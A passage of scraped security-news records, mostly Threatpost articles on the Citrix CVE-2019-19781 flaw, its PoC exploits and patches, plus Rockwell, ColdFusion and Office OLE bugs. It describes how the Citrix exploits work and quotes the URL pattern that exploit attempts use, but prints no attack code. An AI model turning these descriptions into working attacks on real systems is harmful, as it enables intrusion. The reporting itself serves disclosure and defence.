"2020-05-31T21:49:13", "bulletinFamily": "info", "description": "About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.\n\nIf exploited, the flaw could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code-execution. Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.\n\nAccording to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S. originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.\n\n\u201cPatching this bug should be an urgent priority for all remaining companies affected,\u201d said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. \u201cThe critical vulnerability allows attackers to obtain direct access to the company\u2019s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.\u201d\n\nHe added, \u201cThe flaw is really easy to exploit. It\u2019s also very reliable.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN.jpg>)\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, Klyuchnikov told Threatpost that a compromise could easily used as a foothold to move laterally across a victim organization.\n\n\u201cThe critical information about applications accessible by Citrix can be leaked,\u201d he explained. \u201cThat could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.\u201d\n\nAttackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network and credentials for internal services (LDAP, RADIUS and so on).\n\n\u201cDepending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.) of company employees and credentials of other services used in Citrix Gateway [from the configuration files],\u201d he said.\n\nAdding insult to injury, various other kinds of attacks are possible as well.\n\n\u201c[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,\u201d the researcher explained to Threatpost. \u201cIt can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.\u201d\n\nIt\u2019s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password is obtained by the attacker as clear text.\n\nAnd then there\u2019s the remote code-execution danger: \u201cAn attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,\u201d Klyuchnikov noted.\n\nIn-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. Others followed.\n\nhttps://twitter.com/GossiTheDog/status/1214892555306971138\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\nAccording to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent). The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.\n\nLast month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\n\u201cConsidering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],\u201d Klyuchnikov said.\n\nHe added, \u201cI think it\u2019s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "modified": "2020-02-07T15:32:52", "published": "2020-02-07T15:32:52", "id": "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "href": "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "type": "threatpost", "title": "Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-20T21:55:04", "bulletinFamily": "info", "description": "When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)Last week, [Threatpost conducted a reader poll](<https://threatpost.com/poll-published-poc-exploits-good-bad/151966/>) and almost 60 percent of 230 security pundits thought it was a \u201cgood idea\u201d to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn\u2019t a good idea.\n\nThe debate comes on the heels of PoC code being released last week for an [unpatched remote-code-execution vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The PoC exploits, which were published to showcase how the vulnerability in a system can be exploited, raised questions about the positive and negative consequences of releasing such code for an unpatched vulnerability.\n\nSome argued that the code can be used to test networks and pinpoint vulnerable aspects of a system, as well as motivate companies to patch, but others in the security space have argued that PoC code gives attackers a blueprint to launch and automate attacks.\n\n## Security Motivator\n\nMany security experts point to the role of PoC code publication in motivating impacted companies and manufacturers to adopt more effective security measures. That was the argument of one such advocate, Dr. Richard Gold, head of security engineering at Digital Shadows, who said that PoC code enables security teams to test if their systems are exploitable or not.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21153903/tp-poll.png>)\n\n\u201cRather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable,\u201d Gold told Threatpost. \u201cThis ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation.\u201d\n\nIn fact, up to 85 percent of respondents said that the release of PoC code acts as an \u201ceffective motivator\u201d to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been \u201cinstrumental\u201d in preventing an attack. And, 85 percent of respondents said that a PoC code release is acceptable if a vendor won\u2019t fix a bug in a timely manner.\n\nWhen it comes to the[ recent Citrix vulnerability (CVE-2019-19781)](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) for instance, advocates argue that, though PoC exploits were released before a patch was available, the code drew attention to the large amounts of vulnerable devices that were online. Citrix has also [accelerated its patch schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) after PoC exploits were released (though there is no proof of correlation between this and the PoC exploit releases).\n\n\u201cAs a result [of the Citrix PoC exploits], there has been a widespread effort to patch or mitigate vulnerable devices rather than leaving them unpatched or unsecured,\u201d Gold stressed.\n\n## A Jump in Actual Exploits\n\nOn the flip-side of the argument, many argue that the release of the Citrix PoC exploits were a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit the vulnerabilities before they are patched. In fact, 38 percent of respondents in Threatpost\u2019s poll argued that PoC exploit releases are a bad idea.\n\nMatt Thaxton, senior consultant at Crypsis Group, thinks that the \u201cultimate function of a PoC is to lower the bar for others to begin making use of the exploit.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21154131/tp-poll-2.png>)\n\n\u201cI believe there are more negatives than positives to publishing proofs, and generally, it is not a good idea,\u201d he told Threatpost. \u201cIn many cases, PoC\u2019s are put out largely for the notoriety/fame of the publisher and for the developer to \u2018flex\u2019 their abilities.\u201d\n\nJoseph Carson, chief security scientist at Thycotic, told Threatpost that while he thinks PoC exploits can have a positive impact, \u201cit is also important to include what defenders can do to reduce the risks such a methods to harden systems or best practices.\u201d\n\n\u201cLet\u2019s be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them,\u201d said Carson. \u201cSometimes they already know about the zero-day and have been abusing them for years.\u201d\n\nRespondents in the poll were also split about the right amount of time that\u2019s appropriate to release PoC code after a flaw has been disclosed, with 29 percent arguing 90 days is the appropriate amount and others opting for one month (25 percent), one week (23 percent) or two weeks (14 percent).\n\nThis issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: \u201cI believe the release of PoC code functions more like an implied threat to anyone that doesn\u2019t patch: \u2018You\u2019d better patch . . . or else,'\u201d he said \u201cThis kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability.\u201d\n\n## PoC Exploits Surge\n\nAt the end of the day, PoC exploits are continuing to be published. In fact, beyond the release of the Citrix PoC code, a slew of other PoC exploits were released last week, [including ones for](<https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>) a recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) (NSA) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>); and another for critical flaws impacting the [Cisco Data Center Network Manager](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) tool for managing network platforms and switches.\n\nGold, for his part, argued that distinguishing a fine line between a theoretical vulnerability and a successful exploitation of a real system makes all the difference when it comes to PoC exploits versus active exploits.\n\n\u201cOnce that threshold has been crossed, it is understood that attackers will most likely be exploiting this vulnerability in real attacks,\u201d he said. \u201cThis often provided impetus to companies to patch their systems.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Featured](<https://threatpost.com/category/featured/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "modified": "2020-01-22T11:01:52", "published": "2020-01-22T11:01:52", "id": "THREATPOST:48D622E76FCC26F28B32364668BB1930", "href": "https://threatpost.com/poc-exploits-do-more-good-than-harm-threatpost-poll/152053/", "type": "threatpost", "title": "PoC Exploits Do More Good Than Harm: Threatpost Poll", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-19T21:48:03", "bulletinFamily": "info", "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\nThe versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. <https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "modified": "2020-01-21T17:19:28", "published": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:00:56", "bulletinFamily": "info", "description": "A critical denial-of-service (DoS) vulnerability has been found in a Rockwell Automation industrial drive, which is a logic-controlled mechanical component used in industrial systems to manage industrial motors.\n\nThe vulnerability was identified in Rockwell Automation\u2019s PowerFlex 525 drive component, which is used in applications such as conveyors, fans, pumps and mixers. The drive offers a wide range of motor and software controls from regulating volts per hertz and software used to manage EtherNet/IP networks.\n\nThe flaw, CVE-2018-19282, could be exploited to manipulate the drive\u2019s physical process and or stop it, according to researchers with Applied Risk who found it. The vulnerability has a CVSS score of 9.1, making it critical, according to researchers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis finding allows an attacker to crash the Common Industrial Protocol (CIP) in a way that it does not accept any new connection,\u201d Nicholas Merle, with Applied Risk, [wrote in a Thursday analysis](<https://applied-risk.com/application/files/4215/5385/2294/Advisory_AR2019004_Rockwell_Powerflex_525_Denial_of_Service.pdf>) (PDF). \u201cThe current connections however, are kept active, giving attackers complete control over the device.\u201d\n\nThe vulnerability is critical because it gives \u201ccomplete access to the device and DOS for the other users,\u201d an Applied Risk spokesperson told Threatpost. \u201cSo availability and integrity are impacted, with no confidentiality impact. Those are also the most important factors in OT environment.\u201d** **\n\nFor a variable frequency drive, which controls the speed of motors in a live production environment, that kind of shutdown could have a serious impact. There are no known public exploits that target this vulnerability, researchers said. Impacted were versions 5.001 and older for the software.\n\nTo exploit the vulnerability, a bad actor could send a precise sequence of packets effectively crashing the Common Industrial Protocol (the industrial protocol for industrial automation applications) network stack. An Applied Risk spokesperson told Threatpost that an attacker could be remote and wouldn\u2019t need to be authenticated.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/29091619/drive.png>)\n\nRockwell Automation Powerflex 525\n\nThis creates an error in the control and configuration software, which crashes. After it crashes, it is not possible to initiate a new connection to the device, effectively forbidding any legitimate user to recover control, researchers said.\n\nIf the attacker maintains the connection used to send the payload open, he can continue sending commands as long as the connection is not interrupted, and the only way to recover access to the device is to do a power reset, researchers said.** **\n\n\u201cSending a specific UDP packet, a definite amount of time corrupts the\u2026 daemon forbidding any new connection to be initiated and disconnecting the configuration and control software from Rockwell Automation,\u201d said researchers.\n\nThe flaw was first discovered July 30, 2018 and has since been patched. Rockwell Automation did not respond to a request for comment from Threatpost.\n\nVulnerabilities are particularly insidious when they impact industrial control systems because of the high-risk implications. According to a [U.S. Department of Homeland Security bulletin](<https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01>) the bug ([CVE-2018-19282)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19282>) the vulnerability is a threat to U.S. critical infrastructure. Downtime for these systems could pose dire monetary \u2013 and in some cases even life-threatening \u2013 risks.\n\nRockwell Automation isn\u2019t the only industrial control system manufacturer facing security woes. In [February](<https://threatpost.com/siemens-critical-remote-code-execution/141768/>), Siemens released 16 security advisories for various industrial control and utility products, including a warning for a critical flaw in the WibuKey digital rights management (DRM) solution that affects the SICAM 230 process control system.\n\nAnd in August, [Schneider Electric](<https://threatpost.com/high-severity-flaws-patched-in-schneider-electric-products/137034/>) released fixes for a slew of vulnerabilities that can be exploited remotely in two of its industrial control system products.\n", "modified": "2019-03-29T14:13:54", "published": "2019-03-29T14:13:54", "id": "THREATPOST:B956AABD7A9591A8F25851E15000B618", "href": "https://threatpost.com/critical-rockwell-automation-bug-in-drive-component-puts-iiot-plants-at-risk/143258/", "type": "threatpost", "title": "Critical Rockwell Automation Bug in Drive Component Puts IIoT Plants at Risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-17T01:54:29", "bulletinFamily": "info", "description": "Proof-of-concept (PoC) exploit code has been released for an unpatched remote-code-execution vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products.\n\nThe vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), which Threatpost [reported on in December,](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) already packs a double-punch in terms of severity: Researchers say it is extremely easy to exploit, and affects all supported versions of Citrix Gateway products and Citrix ADC, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web.\n\n\u201cThe vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system,\u201d said Qualys [researchers in an analysis last week](<https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781>). \u201cOnce exploited, remote attackers could obtain access to private network resources without requiring authentication.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA patch will not be available until late January, Citrix [has announced](<https://support.citrix.com/article/CTX267027>). That leaves various systems worldwide open to the flaw \u2014 and now, with PoC exploits available on GitHub, researchers expect exploit attempts to skyrocket.\n\n## Exploit PoC Code\n\nOver three weeks after CVE-2019-19781 was first [disclosed (on Dec. 17)](<https://support.citrix.com/article/CTX267027>), this past weekend PoC exploit code for [was released Friday by](<https://github.com/projectzeroindia/CVE-2019-19781>) \u201cProject Zero India,\u201d which describe themselves as \u201ca group of security researchers from India, inspired by Google\u2019s Project Zero.\u201d\n\nThe PoC exploit consists of two curl commands: One to write a template file which would include a user\u2019s shell command, and the second request to download the result of the command execution.\n\nAfter Project Zero India released its exploit, another PoC exploit was released by[ security research group TrustedSec.](<https://github.com/trustedsec/cve-2019-19781/>) This PoC was similar to the first, except it was written in Python and established a reverse shell.\n\nSecurity expert Kevin Beaumont, who dubbed the vulnerability \u201cShitrix,\u201d said on Twitter that the exploit PoC code means \u201cthis is going to get very messy.\u201d\n\nhttps://twitter.com/GossiTheDog/status/1215782882540695552\n\nIn addition, researchers have also[ released scanners](<https://github.com/trustedsec/cve-2019-19781>) and [honeypots](<https://github.com/MalwareTech/CitrixHoneypot>) to see if various servers are vulnerable to CVE-2019-19881.\n\n## The Flaw\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers said that the mitigation steps offered by Citrix suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\n\u201cThe exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\u201d and if user is connected to the SSLVPN, and sends a 403 response,\u201d according to Qualys researchers.\n\nAccording to the Bad Packets Report, over 25,000 servers globally \u2014 with the most in the U.S., Germany and the UK \u2013 are vulnerable to CVE-2019-19781.\n\nhttps://twitter.com/bad_packets/status/1216635462011351040\n\nAffected by the vulnerability are: Citrix ADC and Citrix Gateway version 13.0 all supported builds, Citrix ADC and NetScaler Gateway version 12.1 all supported builds, Citrix ADC and NetScaler Gateway version 12.0 all supported builds, Citrix ADC and NetScaler Gateway version 11.1 all supported builds and Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds.\n\n## Mitigations\n\n\u201cCitrix expects to have firmware updates in the form of refresh builds to be available across all supported versions of Citrix ADC and Citrix Gateway before the end of January 2020,\u201d according to the Citrix security advisory.\n\nA patch will be released on Jan. 20 for Citrix ADC versions 11/12 and 13, while a patch for version 10 will be released Jan. 31, according to Citrix.\n\nIn the meantime, Citrix has released [mitigation steps](<https://support.citrix.com/article/CTX267679>) for CVE-2019-19781. Researchers are also urging customers to check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nSecurity experts like Dave Kennedy [took to Twitter](<https://twitter.com/HackingDave/status/1215800253246513155?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1215800253246513155&amp;ref_url=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fproof-of-concept-code-published-for-citrix-bug-as-attacks-intensify%2F>) meanwhile to warn customers to apply mitigations until a patch is available.\n\n> Can\u2019t emphasize enough \u2013 please please please do the mitigation steps for the Citrix exploit as soon as possible. \n> \n> This is going to be a really bad one folks. \n> \n> Easy to automate and exploit and is widely used across the Internet.\n> \n> Mitigation here: <https://t.co/jeF0UC6A9V>\n> \n> \u2014 Dave Kennedy (ReL1K) (@HackingDave) [January 11, 2020](<https://twitter.com/HackingDave/status/1215800253246513155?ref_src=twsrc%5Etfw>)\n\nMikhail Klyuchnikov of Positive Technologies, Gianlorenzo Cipparrone and Miguel Gonzalez of Paddy Power Betfair plc were credited with finding the flaw.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "modified": "2020-01-13T15:32:42", "published": "2020-01-13T15:32:42", "id": "THREATPOST:99610F4016AECF953EEE643779490F30", "href": "https://threatpost.com/unpatched-citrix-flaw-exploits/151748/", "type": "threatpost", "title": "Unpatched Citrix Flaw Now Has PoC Exploits", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-08T11:40:59", "bulletinFamily": "info", "description": "Adobe has issued an emergency patch for a critical vulnerability in its ColdFusion service that is being exploited in the wild.\n\nThe vulnerability, CVE-2019-7816, exists in Adobe\u2019s commercial rapid web application development platform, ColdFusion. The ColdFusion vulnerability is a file upload restriction bypass which could enable arbitrary code execution.\n\n\u201cAdobe has released security updates for ColdFusion versions 2018, 2016 and 11,\u201d according to the company\u2019s [security update](<https://helpx.adobe.com/security/products/coldfusion/apsb19-14.html>). \u201cThese updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis attack requires the ability to upload executable code to a web-accessible directory, and then execute that code via an HTTP request, so restricting requests to directories where uploaded files are stored will mitigate the attack, Adobe said.\n\nImpacted is ColdFusion 2018, update 2 and earlier; ColdFusion 2016, update 9 and earlier; and ColdFusion 11, update 17 and earlier versions. The security update has a priority 1 rating, meaning that it resolves vulnerabilities being targeted by exploits in the wild.\n\n\u201cAdobe recommends administrators install the update as soon as possible. (for example, within 72 hours),\u201d according to the company\u2019s priority update [page](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nCharlie Arehart, Moshe Ruzin, Josh Ford, Jason Solarek, and Bridge Catalog Team were credited with discovering the vulnerability.\n\nOne of these researchers, Charlie Arehart, told Threatpost that he is still in discussions with Adobe PSIRT about what can be publicly released. In the meantime, no further details about the vulnerability or subsequent exploits have been released.\n\nThe emergency update comes a week after a separate [unscheduled Adobe update](<https://threatpost.com/adobe-re-patches-critical-acrobat-reader-flaw/142098/>), which fixed a critical zero-day vulnerability in Acrobat Reader. The zero-day vulnerability in Adobe Reader, disclosed by Alex Infuhr from cure53 in a Jan. 26 post, enabled bad actors to steal victims\u2019 hashed password values, known as \u201cNTLM hashes.\u201d\n", "modified": "2019-03-01T20:22:43", "published": "2019-03-01T20:22:43", "id": "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "href": "https://threatpost.com/adobe-patches-critical-coldfusion-vulnerability-with-active-exploit/142391/", "type": "threatpost", "title": "Adobe Patches Critical ColdFusion Vulnerability With Active Exploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:52", "bulletinFamily": "info", "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word attachments contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out on a bypass to allow this go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument). Streams can also contain information on macros in the document and the metadata of a document (i.e., title, author, creation date, etc.).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, it\u2019s offset computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, 